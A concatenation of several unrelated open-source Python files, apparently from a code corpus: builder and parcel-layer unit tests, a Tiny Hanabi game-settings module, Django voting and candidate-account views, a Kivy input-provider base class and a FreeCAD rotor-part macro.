submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
builder = self.make_builder(
'foo', build_commands=['make'], usage='pkg_config',
submodules=submodules_required
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['foo_sub'],
'extra_args': [],
})
builder = self.make_builder(
'foo', build_commands=['make'],
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_required
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
builder = self.make_builder(
'foo', build_commands=['make'], usage='pkg_config',
submodules=submodules_optional
)
self.check_build(builder, submodules=['sub'])
builder = self.make_builder(
'foo', build_commands=['make'],
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_optional
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
def test_clean(self):
builder = self.make_builder('foo', build_commands=['make'],
usage='pkg_config')
srcdir = os.path.join(self.pkgdir, 'build', 'foo')
with mock.patch('shutil.rmtree') as mrmtree:
builder.clean(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
def test_rehydrate(self):
opts = self.make_options()
builder = CustomBuilder('foo', build_commands=['make'],
submodules=None, _options=opts)
builder.set_usage({'type': 'pkg_config', 'path': 'pkgconf'},
submodules=None)
data = through_json(builder.dehydrate())
self.assertEqual(builder, Builder.rehydrate(data, _options=opts))
def test_upgrade(self):
opts = self.make_options()
data = {'type': 'custom', '_version': 0, 'name': 'foo',
'build_commands': [], 'deploy_commands': None,
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(CustomBuilder, 'upgrade',
side_effect=CustomBuilder.upgrade) as m:
pkg = Builder.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, CustomBuilder)
m.assert_called_once()
| 2.234375 | 2 |
tiny_hanabi/game/settings.py | ssokota/tiny-hanabi | 8 | 12773191 | <reponame>ssokota/tiny-hanabi
"""Learning settings for decentralized control. Most obvious setting is the
DecPOMDP, in which multiple learners interact with the environment. Other
settings are various ways of centralizing the learning problem. In these
settings, a single agent dictates the policy of all players. Inheritance
structure is:
Game:
-> DecPOMDP : For multi-agent learning algorithms
-> PuBMDP : For single-agent learning algorithms
(exploits public knowledge)
-> TBMDP : For single-agent learning algorithms
(exploits temporal knowledge)
-> VBMDP : For single-agent learning algorithms
(exploits vacuous knowledge)
"""
from abc import ABC, abstractmethod
from enum import Enum
import itertools
from typing import Optional, Union, Dict
import numpy as np
statetype = Union[None, int, tuple]
class Settings(Enum):
decpomdp = "decpomdp"
pubmdp = "pubmdp"
tbmdp = "tbmdp"
vbmdp = "vbmdp"
class Game(ABC):
def __init__(self, payoffs: np.ndarray, optimal_return: float) -> None:
"""Base class for games
Args:
payoffs: Payoff matrix indexed card1, card2, action1, action2
optimal_return: Expected return of an optimal joint policy
Attributes:
num_cards (int): The number of cards in the deck
num_actions (int): The number of actions available to each player
history: (list): The events that have occurred so far
Note that this is NOT a history in a technical sense, it is
a list of information required for agents to perform updates.
num_players (int): The number of players in the game. It may either
                be two or one depending on the setting, so it is initialized
                to a placeholder value of 0 in the base class.
            horizon (int): The length of terminal histories. It varies from
                two to four depending on the setting, so it is initialized to
                a placeholder value of 0 in the base class.
payoffs: See args
optimal_return: See args
"""
self.num_cards = payoffs.shape[0]
self.num_actions = payoffs.shape[-1]
self.reset()
self.num_players = 0
self.horizon = 0
self.payoffs = payoffs
self.optimal_return = optimal_return
@abstractmethod
def start_states(self) -> tuple:
"""Return tuple of start states for the game"""
def random_start(self) -> None:
"""Initialize history at random start state (each is equiprobable)"""
start_states = self.start_states()
self.history = start_states[np.random.choice(range(len(start_states)))]
def is_terminal(self) -> bool:
"""Checks whether the game is over"""
return len(self.history) == self.horizon
def payoff(self) -> float:
"""Return the reward for the current history
In Tiny Hanabi games the reward is zero unless the history is terminal
"""
return self.payoffs[tuple(self.history)] if self.is_terminal() else 0.0
@abstractmethod
def step(self, action: int) -> None:
"""Process the player's action"""
@abstractmethod
def num_legal_actions(self) -> int:
"""Return the number of legal actions at the current history"""
@abstractmethod
def context(self) -> statetype:
"""Return the context required by the acting player"""
@abstractmethod
def episode(self) -> list:
"""Return information about the current episode's trajectory"""
def reset(self, history: Optional[list] = None) -> None:
"""Reset the game to `history` or a random start state
Args:
history: History to reset the game to; `None` means random start
"""
if history is None:
self.random_start()
else:
self.history = history
class DecPOMDP(Game):
def __init__(self, payoffs: np.ndarray, optimal_return: float):
"""Decentralized partially observable Markov decision process
Args:
See base class
Attributes:
See base class
"""
super().__init__(payoffs, optimal_return)
self.num_players = 2
self.horizon = 4
def start_states(self) -> tuple:
"""Returns tuple of possible deals [card1, card2]"""
return tuple(
[i, j] for i in range(self.num_cards) for j in range(self.num_cards)
)
def step(self, action: int) -> None:
"""Appends `action` to `history`"""
self.history.append(action)
def num_legal_actions(self) -> int:
"""Return the number of legal actions at the current history"""
return self.num_actions
def context(self) -> tuple:
"""Return the history (agent must parse into infostate)"""
return tuple(self.history)
def episode(self) -> list:
"""Return the history and the payoff"""
return self.history + [self.payoff()]
class PuBMDP(Game):
def __init__(self, payoffs: np.ndarray, optimal_return: float) -> None:
"""Public belief Markov decision process
Args:
See base class
Attributes:
See base class
payoffs (dict): The payoffs for the PuB-MDP
beliefs (dict): Maps a tuple of the first action and first
prescription to the corresponding public belief state.
"""
super().__init__(payoffs, optimal_return)
self.num_players = 1
self.horizon = 4
self.build(payoffs)
def start_states(self) -> tuple:
"""Return the start states
The start states are the deals to player 1.
"""
return tuple([c] for c in range(self.num_cards))
def step(self, prescription: int) -> None:
"""Update the game given the prescription
For the first time step, the game picks player 1's action according to
prescription and the deal for player one. It adds the prescription and
the corresponding belief state to the history. For the second time
step, the game appends the prescription to the history.
Args:
prescription: The coordinator's action
"""
if len(self.history) == 1:
prescription1_table = table_repr(
prescription, self.num_cards, self.num_actions
)
action = np.argmax(prescription1_table[self.history[0]])
belief = self.beliefs[prescription, action]
self.history += [prescription, belief]
elif len(self.history) == 3:
self.history.append(prescription)
def context(self) -> Optional[int]:
"""Return the public belief state
Before the coordinator has acted, there is only one public belief
state since the coordinator has no information. After the coordinator
has acted once, the public belief becomes the last item in `history`.
Note that the return values are bijective with the public belief states
rather than the public belief states themselves.
"""
return None if len(self.history) == 1 else self.history[-1]
def episode(self) -> list:
"""Return a list of (state, action, reward) PuB-MDP transitions"""
return [(None, self.history[1], 0), (*self.history[2:], self.payoff())]
def num_legal_actions(self) -> int:
"""Return the number of legal prescriptions"""
return self.num_prescriptions
def build(self, payoffs: np.ndarray) -> None:
"""Build the PuB-MDP corresponding to `payoffs`
Build the game by looping over all PuB-MDP trajectories.
Args:
payoffs : Payoff matrix indexed card1, card2, action1, action2
"""
num_possible_info_state = self.num_cards
self.num_prescriptions = self.num_actions ** num_possible_info_state
self.beliefs = {}
self.payoffs = {}
# First loop over the coordinator's initial prescriptions
for prescription1 in range(self.num_prescriptions):
prescription1_table = table_repr(
prescription1, self.num_cards, self.num_actions
)
# Then loop over the private obs for player 1
for c1 in range(self.num_cards):
# Public obs corresponding to the private obs `c1`
a1 = np.argmax(prescription1_table[c1])
# Posterior over player 1's private obs from coordinator's view
possible_c1 = np.flatnonzero(prescription1_table[:, a1])
# Corresponding public belief state
b = (tuple(possible_c1), a1)
self.beliefs[prescription1, a1] = b
for prescription2 in range(self.num_prescriptions):
prescription2_table = table_repr(
prescription2, self.num_cards, self.num_actions
)
tmp = []
# Payoff in PuB-MDP = expected payoff over public belief
for c1_ in possible_c1:
for c2_ in range(self.num_cards):
a2 = np.argmax(prescription2_table[c2_])
tmp.append(payoffs[c1_, c2_, a1, a2])
self.payoffs[c1, prescription1, b, prescription2] = np.mean(tmp)
class TBMDP(Game):
def __init__(self, payoffs: np.ndarray, optimal_return: float) -> None:
"""Temporal belief Markov decision process
Args:
See base class
Attributes:
See base class
payoffs (dict): The payoffs for the TB-MDP
legal_actions (dict): Maps temporal belief state to the number of
legal prescriptions.
"""
super().__init__(payoffs, optimal_return)
self.num_players = 1
self.horizon = 2
self.build(payoffs)
def start_states(self) -> tuple:
"""Return the start states
The TB-MDP is deterministic so there is only one start state.
"""
return ([],)
def step(self, action: int) -> None:
"""Append action to history"""
self.history.append(action)
def num_legal_actions(self) -> int:
"""Return the number of legal prescriptions
The size of the support of the temporal belief state varies based on
the first prescription. As a result, the number of legal second
prescriptions depends on the first prescription.
"""
if len(self.history) == 0:
return self.legal_actions[None]
return self.legal_actions[self.history[0]]
def context(self) -> Optional[int]:
"""Return the temporal belief state
Note that the return values (nothing on the first time step and the
first prescription on the second time step) are bijective with the
temporal belief states rather than the temporal belief states
themselves.
"""
if len(self.history) == 0:
return None
elif len(self.history) == 1:
return self.history[0]
        raise Exception("context() called on a terminal history")
def episode(self) -> list:
"""Return a list of (state, action, reward) TB-MDP transitions"""
return [
(None, self.history[0], 0),
(self.history[0], self.history[1], self.payoff()),
]
def build(self, payoffs: np.ndarray) -> None:
"""Build the TB-MDP corresponding to `payoffs`
Build the game by looping over all PuB-MDP trajectories.
Args:
payoffs : Payoff matrix indexed card1, card2, action1, action2
"""
self.payoffs = {}
self.legal_actions: Dict[Optional[int], int] = {}
num_possible_info_state1 = self.num_cards
num_prescriptions1 = self.num_actions ** num_possible_info_state1
self.legal_actions[None] = num_prescriptions1
# First loop over the coordinator's initial prescriptions
for prescription1 in range(num_prescriptions1):
prescription1_table = table_repr(
prescription1, self.num_cards, self.num_actions
)
# Compute possible obs for player 2
possible_a1 = np.flatnonzero(prescription1_table.max(axis=0))
# Compute possible info states for player 2
num_possible_info_state2 = self.num_cards * len(possible_a1)
# Compute number of legal prescriptions for coordinator
num_legal_actions2 = self.num_actions ** num_possible_info_state2
self.legal_actions[prescription1] = num_legal_actions2
for prescription2 in range(num_legal_actions2):
prescription2_table = table_repr(
prescription2, num_possible_info_state2, self.num_actions
)
# Indexing the rows of the second prescription table takes a
# bit more work because they are indexed by both the player 2's
# card and player 1's action.
idx = {
(c2_, a1_): i
for i, (c2_, a1_) in enumerate(
itertools.product(range(self.num_cards), possible_a1)
)
}
tmp = []
# Payoff in TB-MDP = expected payoff over temporal belief
for c1_ in range(self.num_cards):
for c2_ in range(self.num_cards):
a1_ = np.argmax(prescription1_table[c1_])
a2_ = np.argmax(prescription2_table[idx[(c2_, a1_)]])
tmp.append(payoffs[c1_, c2_, a1_, a2_])
self.payoffs[prescription1, prescription2] = np.mean(tmp)
class VBMDP(Game):
def __init__(self, payoffs: np.ndarray, optimal_return: float) -> None:
"""Vacuous belief Markov decision process
Args:
See base class
Attributes:
See base class
payoffs (dict): The payoffs for the VB-MDP
num_action_profiles (int): The number of action profiles
"""
super().__init__(payoffs, optimal_return)
self.num_players = 1
self.horizon = 1
self.build(payoffs)
def start_states(self) -> tuple:
"""Return the start states
There is only one start state for the VB-MDP.
"""
return ([],)
def context(self) -> None:
"""Return the one belief state
As the name suggests, there is only one belief state in the VB-MDP.
Note that we are returning something bijective with it, rather than
actually computing it.
"""
return None
def step(self, action: int) -> None:
"""Append `action` to `history`"""
self.history.append(action)
def num_legal_actions(self) -> int:
"""Return number of legal prescriptions"""
return self.num_action_profiles
def episode(self) -> list:
"""Return list of (start, action, reward) VB-MDP transitions"""
return [(None, self.history[0], self.payoff())]
def build(self, payoffs: np.ndarray) -> None:
"""Build the VB-MDP corresponding to `payoffs`
Build the game by looping over all VB-MDP trajectories.
Args:
payoffs: Payoff matrix indexed card1, card2, action1, action2
"""
self.payoffs = {}
num_cards = payoffs.shape[0]
num_actions = payoffs.shape[-1]
num_p1_info_states = num_cards
num_p2_info_states = num_cards * num_actions
num_info_states = num_p1_info_states + num_p2_info_states
num_p1_action_profiles = num_actions ** num_p1_info_states
num_p2_action_profiles = num_actions ** num_p2_info_states
# Number of action profiles
self.num_action_profiles = num_p1_action_profiles * num_p2_action_profiles
# Loop over action profiles
for action_profile in range(self.num_action_profiles):
action_profile_table = table_repr(
action_profile, num_info_states, num_actions
)
tmp = []
# Payoff in VB-MDP is expected payoff over the one belief state
for c1 in range(num_cards):
for c2 in range(num_cards):
a1 = np.argmax(action_profile_table[c1])
p2_info_state_idx = num_cards + a1 * num_cards + c2
a2 = np.argmax(action_profile_table[p2_info_state_idx])
tmp.append(payoffs[c1, c2, a1, a2])
self.payoffs[(action_profile,)] = np.mean(tmp)
def table_repr(index: int, num_info_states: int, num_actions: int) -> np.ndarray:
"""Express prescription with a table representation.
Args:
index: Index of the prescription
        num_info_states: Number of possible info states
        num_actions: Number of legal actions
    Returns:
        `num_info_states` by `num_actions` representation of the prescription,
        where (i, j) -> prescribed probability of action j given infostate i.
"""
table = np.zeros((num_info_states, num_actions))
for info_state in range(num_info_states):
table[info_state, index % num_actions] = 1
index = index // num_actions
return table
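# Illustrative check (not in the original module): prescription indices
# decode like base-`num_actions` digits, least significant digit first.
if __name__ == "__main__":
    t = table_repr(index=6, num_info_states=2, num_actions=4)
    # 6 = 2 + 1 * 4 -> info state 0 plays action 2, info state 1 plays action 1
    assert t[0, 2] == 1 and t[1, 1] == 1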
| 3.78125 | 4 |
src/ssm_document_generator/definition/parameters/parameter.py | awslabs/aws-systems-manager-document-generator | 54 | 12773192 | <filename>src/ssm_document_generator/definition/parameters/parameter.py
from ssm_document_generator import utils
class Parameter:
def __init__(self, name, description='', parameter_type='String', default=None, allowed_pattern=None):
self.name = name
self.parameter_type = parameter_type
self.description = description
self.default = default
self.allowed_pattern = allowed_pattern
def get_dict(self):
return utils.dict_without_none_entries({'type': self.parameter_type,
'description': self.description,
'allowedPattern': self.allowed_pattern,
'default': self.default})
def add_to_dict(self, params_dict):
params_dict[self.name] = self.get_dict()
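# Illustrative usage sketch (assumed parameter values, not from the repo):
if __name__ == "__main__":
    params = {}
    Parameter("commands", description="Shell commands to run",
              parameter_type="StringList").add_to_dict(params)
    # params == {'commands': {'type': 'StringList',
    #                         'description': 'Shell commands to run'}}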
| 2.40625 | 2 |
test/geo/layer/test_parcel.py | Crashillo/CatAtom2Osm | 0 | 12773193 | import logging
import unittest
import mock
from qgis.core import QgsVectorLayer
from catatom2osm.app import QgsSingleton
from catatom2osm.geo.geometry import Geometry
from catatom2osm.geo.layer.cons import ConsLayer
from catatom2osm.geo.layer.parcel import ParcelLayer
qgs = QgsSingleton()
m_log = mock.MagicMock()
m_log.app_level = logging.INFO
class TestParcelLayer(unittest.TestCase):
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
def setUp(self):
fn = "test/fixtures/parcel.gpkg|layername=parcel"
self.parcel = ParcelLayer("38012")
fixture = QgsVectorLayer(fn, "parcel", "ogr")
self.assertTrue(fixture.isValid(), "Loading fixture")
self.parcel.append(fixture)
self.assertEqual(self.parcel.featureCount(), 186)
fn = "test/fixtures/cons.gpkg|layername=cons"
fixture2 = QgsVectorLayer(fn, "cons", "ogr")
self.building = ConsLayer("MultiPolygon", "cons", "memory")
self.building.append(fixture2)
self.assertTrue(self.building.isValid(), "Loading fixture")
def test_init(self):
layer = ParcelLayer("38012")
self.assertEqual(layer.fields()[0].name(), "localId")
self.assertEqual(layer.fields()[1].name(), "parts")
self.assertEqual(layer.rename["localId"], "inspireId_localId")
def test_not_empty(self):
layer = ParcelLayer("38012")
self.assertGreater(len(layer.fields().toList()), 0)
def test_delete_void_parcels(self):
self.parcel.delete_void_parcels(self.building)
self.assertEqual(self.parcel.featureCount(), 110)
def test_create_missing_parcels(self):
self.parcel.create_missing_parcels(self.building)
self.assertEqual(self.parcel.featureCount(), 188)
p = next(self.parcel.search("localId = '8642317CS5284S'"))
self.assertEqual(len(Geometry.get_multipolygon(p)[0]), 1)
def test_get_groups_by_adjacent_buildings(self):
self.parcel.create_missing_parcels(self.building)
pa_groups, pa_refs, __ = self.parcel.get_groups_by_adjacent_buildings(
self.building
)
self.assertEqual(len(pa_groups), 21)
self.assertEqual(sum([len(gr) for gr in pa_groups]), 85)
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_merge_by_adjacent_buildings(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
self.parcel.count_parts(self.building)
pca = sum([f["parts"] for f in self.parcel.getFeatures()])
la = self.parcel.featureCount()
tasks = self.parcel.merge_by_adjacent_buildings(self.building)
pcd = sum([f["parts"] for f in self.parcel.getFeatures()])
ld = self.parcel.featureCount()
cl = len([k for k, v in tasks.items() if k != v])
self.assertEqual(ld, la - cl)
self.assertEqual(pca, pcd)
pa_refs = [f["localId"] for f in self.parcel.getFeatures()]
expected = [
"001000300CS52D",
"001000400CS52D",
"8641608CS5284S",
"8641612CS5284S",
"8641613CS5284S",
"8641616CS5284S",
"8641620CS5284S",
"8641621CS5284S",
"8641632CS5284S",
"8641636CS5284S",
"8641638CS5284S",
"8641649CS5284S",
"8641653CS5284S",
"8641658CS5284S",
"8641660CS5284S",
"8642302CS5284S",
"8642310CS5284S",
"8642312CS5284S",
"8642313CS5284S",
"8642314CS5284S",
"8642317CS5284S",
"8642321CS5284S",
"8642325CS5484N",
"8642701CS5284S",
"8742701CS5284S",
"8742707CS5284S",
"8742711CS5284S",
"8742721CS5284S",
"8839301CS5283N",
"8840501CS5284S",
"8841602CS5284S",
"8841603CS5284S",
"8844121CS5284S",
"8940301CS5284S",
"8940302CS5284S",
"8940305CS5284S",
"8940306CS5284S",
"8940307CS5284S",
"8940309CS5284S",
"8941505CS5284S",
"9041703CS5294S",
"9041704CS5294S",
"9041705CS5294S",
"9041716CS5294S",
"9041719CS5294S",
"9042401CS5294S",
"9042402CS5294S",
"9042404CS5294S",
]
self.assertEqual(pa_refs, expected)
f = next(self.parcel.search("localId = '8840501CS5284S'"))
self.assertEqual(f["parts"], 11)
merged = []
for bu in self.building.getFeatures():
if self.building.is_building(bu):
ref = self.building.get_id(bu)
if ref not in pa_refs:
merged.append(ref)
self.assertEqual(len(merged), 71)
self.assertTrue(all([tasks[ref] != ref for ref in merged]))
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_count_parts(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
parts_count = self.parcel.count_parts(self.building)
self.assertEqual(sum(parts_count.values()), 324)
self.assertEqual(len(parts_count), self.parcel.featureCount())
f = next(self.parcel.search("localId = '8840501CS5284S'"))
self.assertEqual(f["parts"], 7)
self.assertEqual(parts_count["8840501CS5284S"], 7)
f = next(self.parcel.search("localId = '8840502CS5284S'"))
self.assertEqual(f["parts"], 4)
self.assertEqual(parts_count["8840502CS5284S"], 4)
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_get_groups_by_parts_count(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
self.parcel.count_parts(self.building)
self.parcel.merge_by_adjacent_buildings(self.building)
features = {pa.id(): pa for pa in self.parcel.getFeatures()}
(
pa_groups,
pa_refs,
geometries,
parts_count,
) = self.parcel.get_groups_by_parts_count(10, 100)
self.assertEqual(len(parts_count), 48)
self.assertEqual(len(pa_groups), 18)
self.assertTrue(
all(
[
sum([parts_count[pa_refs[fid]] for fid in group]) <= 10
for group in pa_groups
]
)
)
label_count = set(
[
len(set([self.parcel.get_zone(features[fid]) for fid in group]))
for group in pa_groups
]
)
self.assertEqual(label_count, {1})
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_merge_by_parts_count(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
self.parcel.merge_by_adjacent_buildings(self.building)
pca = sum([f["parts"] for f in self.parcel.getFeatures()])
la = self.parcel.featureCount()
tasks = self.parcel.merge_by_parts_count(20, 30)
pcd = sum([f["parts"] for f in self.parcel.getFeatures()])
ld = self.parcel.featureCount()
cl = len([k for k, v in tasks.items() if k != v])
self.assertEqual(ld, la - cl)
self.assertEqual(pca, pcd)
| 2.515625 | 3 |
voting/urls.py | Tatuska23/hlasovani | 0 | 12773194 | <reponame>Tatuska23/hlasovani<filename>voting/urls.py
from django.conf.urls import url
from voting import views
## A list of the URLs this project contains, and the functions that handle them.
## An introduction to urlpatterns is in myfirstapp/urls.py.
urlpatterns = [
    ## The empty URL (^ - start of string, $ - end of string) is handled
    ## by the "poll_list" function from views.py.
    ## This function returns a page listing all polls.
url(r'^$', views.poll_list, name='poll_list'),
    ## A URL like "polls/123" is handled by the "poll_detail" function from
    ## views.py. This function takes a "pk" argument (hence the "(?P<pk>" in
    ## the regular expression) and returns the page for the matching poll.
url(r'^polls/(?P<pk>\d+)$', views.poll_detail, name='poll_detail'),
url(r'^info/', views.info, name='info_o_projektu'),
url(r'^polls/(?P<pk>\d+)/nova_moznost/', views.moznost, name='pridani_moznosti'),
]
| 2.1875 | 2 |
kivy/input/provider.py | sirpercival/kivy | 317 | 12773195 | '''
Motion Event Provider
=====================
Abstract class for the implementation of a
:class:`~kivy.input.motionevent.MotionEvent`
provider. The implementation must support the
:meth:`~MotionEventProvider.start`, :meth:`~MotionEventProvider.stop` and
:meth:`~MotionEventProvider.update` methods.
'''
__all__ = ('MotionEventProvider', )
class MotionEventProvider(object):
'''Base class for a provider.
'''
def __init__(self, device, args):
self.device = device
if self.__class__ == MotionEventProvider:
raise NotImplementedError('class MotionEventProvider is abstract')
def start(self):
'''Start the provider. This method is automatically called when the
application is started and if the configuration uses the current
provider.
'''
pass
def stop(self):
'''Stop the provider.
'''
pass
def update(self, dispatch_fn):
        '''Update the provider and dispatch all the new touch events through the
`dispatch_fn` argument.
'''
pass
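# Minimal subclass sketch (illustrative, not part of Kivy itself): a concrete
# provider implements at least update(), dispatching each new event:
# class NullMotionEventProvider(MotionEventProvider):
#     def update(self, dispatch_fn):
#         pass  # poll the device here; call dispatch_fn(event_type, motion_event)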
| 2.625 | 3 |
auth/__init__.py | pfspontus/lexwheels | 0 | 12773196 | <reponame>pfspontus/lexwheels
"""
User authentication views
"""
import functools
from flask import Blueprint
from flask import g
from flask import redirect
from flask import request
from flask import url_for
from auth import views
define = views.define
auth_page = Blueprint('auth', __name__, url_prefix='/auth',
template_folder='templates')
def login_required(view):
"""
    Wrapper to decorate the given view, enforcing authentication.
"""
@functools.wraps(view)
def wrapped_view(**kwargs):
if g.user is None:
return redirect(url_for('auth.login', next=request.url))
return view(**kwargs)
return wrapped_view
| 2.578125 | 3 |
Patent_US20020125774A1_Molina_Martinez_Generator/Version_1/part_rotor.py | Jay4C/Python-Macros-For_FreeCAD | 0 | 12773197 | import FreeCAD, Part, Drawing, math, Mesh, importDXF
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_rotor"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * (-0.5)
maximal_diameter = 100
# part_rotor
part_rotor = Part.makeCylinder(maximal_diameter/2 - 5 - 5 - 5, 1)
# part_rotor cut by cylinder_1
cylinder_1 = Part.makeCylinder(2.5, 1)
part_rotor = part_rotor.cut(cylinder_1)
# holes for fixing the rotors
degre = 180
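# 360/degre holes are spaced evenly around the circle; each centre is the
# polar point (radius, alpha) converted to Cartesian (r*cos(a), r*sin(a))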
for i in range(int(360/degre)):
radius = 2.5 + 10 + 2.5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(2.5, 1)
hole.translate(hole_vector)
part_rotor = part_rotor.cut(hole)
# holes for fixing the wires
degre = 30
for i in range(int(360/degre)):
radius = maximal_diameter/2 - 5 - 5 - 5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(6.5, 1)
hole.translate(hole_vector)
part_rotor = part_rotor.cut(hole)
Part.show(part_rotor)
DOC.recompute()
__objs__ = []
__objs__.append(FreeCAD.getDocument("part_rotor").getObject("Shape"))
stl_file = u"part_rotor.stl"
Mesh.export(__objs__, stl_file)
dxf_file = u"part_rotor.dxf"
importDXF.export(__objs__, dxf_file)
setview()
| 2.65625 | 3 |
hknweb/candidate/views/mass_add_cands.py | Boomaa23/hknweb | 0 | 12773198 | import csv
from collections import OrderedDict
import threading
import time
from typing import Tuple
from django.http import Http404, JsonResponse
from django.shortcuts import render
from django.conf import settings
from django.contrib.auth.models import BaseUserManager, Group, User
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
from hknweb.thread.models import ThreadTask
from hknweb.utils import login_and_permission, get_rand_photo
from hknweb.models import Profile
from hknweb.views.users import get_current_cand_semester
from hknweb.candidate.constants import (
ATTR,
CandidateDTO,
DEFAULT_RANDOM_PASSWORD_LENGTH,
)
@login_and_permission("auth.add_user")
def create_candidates_view(request):
"""
View for creating multiple candidates given a CSV of their information
See "add_cands" for more details
"""
return render(request, "candidate/create_candidates.html")
@login_and_permission("auth.add_user")
def add_cands(request):
if request.method != ATTR.POST:
raise Http404()
cand_csv_file = request.FILES.get(ATTR.CAND_CSV, None)
if cand_csv_file is None:
return JsonResponse(
{
"success": False,
"id": -1,
"message": "No file detected (can be internal error)",
}
)
if not cand_csv_file.name.endswith(ATTR.CSV_ENDING):
return JsonResponse(
{"success": False, "id": -1, "message": "Please input a csv file!"}
)
decoded_cand_csv_file = cand_csv_file.read().decode(ATTR.UTF8SIG).splitlines()
cand_csv = csv.DictReader(decoded_cand_csv_file)
num_rows = sum(1 for _ in csv.DictReader(decoded_cand_csv_file))
website_login_link = request.build_absolute_uri("/accounts/login/")
task_id = spawn_threaded_add_cands_and_email(cand_csv, website_login_link, num_rows)
return JsonResponse({"success": True, "id": task_id, "message": ""})
@login_and_permission("auth.add_user")
def check_mass_candidate_status(request, id):
task = ThreadTask.objects.get(pk=id)
return JsonResponse(
{
"progress": task.progress,
"message": task.message,
"is_successful": task.is_successful,
"is_done": task.is_done,
}
)
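# Client-side usage sketch (illustrative, not from the original repo): the
# upload page can poll this endpoint with the task id returned by add_cands,
# rendering "progress" (0-100) and "message" until "is_done" becomes true.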
NO_ACTION_PLS_FIX = "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
def spawn_threaded_add_cands_and_email(cand_csv, website_login_link, num_rows):
"""
Spawn a single background thread to provision candidate
"""
task = ThreadTask()
task.save()
t = threading.Thread(
target=threaded_add_cands_and_email,
args=[cand_csv, num_rows, website_login_link, task],
)
task.startThread(t)
return task.id
def threaded_add_cands_and_email(cand_csv, num_rows, website_login_link, task):
try:
result, msg = add_cands_and_email(cand_csv, num_rows, website_login_link, task)
except Exception as e:
result = False
msg = str(e)
task.message = msg
if result:
task.complete()
else:
task.failure()
task.progress = 100
task.save()
def check_duplicates(
candidatedto: CandidateDTO,
row: OrderedDict,
email_set: set,
username_set: set,
i: int,
) -> Tuple[bool, str]:
error_msg = ""
# Check for duplicate Email
cand_email_in_set = candidatedto.email in email_set
if cand_email_in_set or User.objects.filter(email=candidatedto.email).count() > 0:
if cand_email_in_set:
error_msg = "Duplicate email {} in the Candidate data.".format(
candidatedto.email
)
else:
error_msg = "Account with email {} already exists.".format(
candidatedto.email
)
error_msg += " "
error_msg += "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
error_msg += " "
error_msg += "Error Row Information at row {}: {}.".format(i + 1, row)
return True, error_msg
# Check for duplicate Username
cand_username_in_set = candidatedto.username in username_set
if (
cand_username_in_set
or User.objects.filter(username=candidatedto.username).count() > 0
):
if cand_username_in_set:
error_msg = "Duplicate username {} in the Candidate data.".format(
candidatedto.username
)
else:
error_msg = "Account of username {} already exists.".format(
candidatedto.username
)
error_msg += " "
error_msg += "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
error_msg += " "
error_msg += "Error Row Information at row {}: {}.".format(i + 1, row)
return True, error_msg
return False, ""
def add_cands_and_email(cand_csv, num_rows, website_login_link, task=None):
candidate_group = Group.objects.get(name=ATTR.CANDIDATE)
progress_float = 0.0
CAND_ACC_WEIGHT = 0.75
EMAIL_WEIGHT = 0.25
# Sanity check progress
if task is not None:
task.progress = 1.0
task.save()
# Pre-screen and validate data
new_cand_list = []
email_set = set()
username_set = set()
current_cand_semester = get_current_cand_semester()
email_passwords = {}
if current_cand_semester is None:
error_msg = "Inform CompServ the following: Please add the current semester in CourseSemester."
error_msg += " "
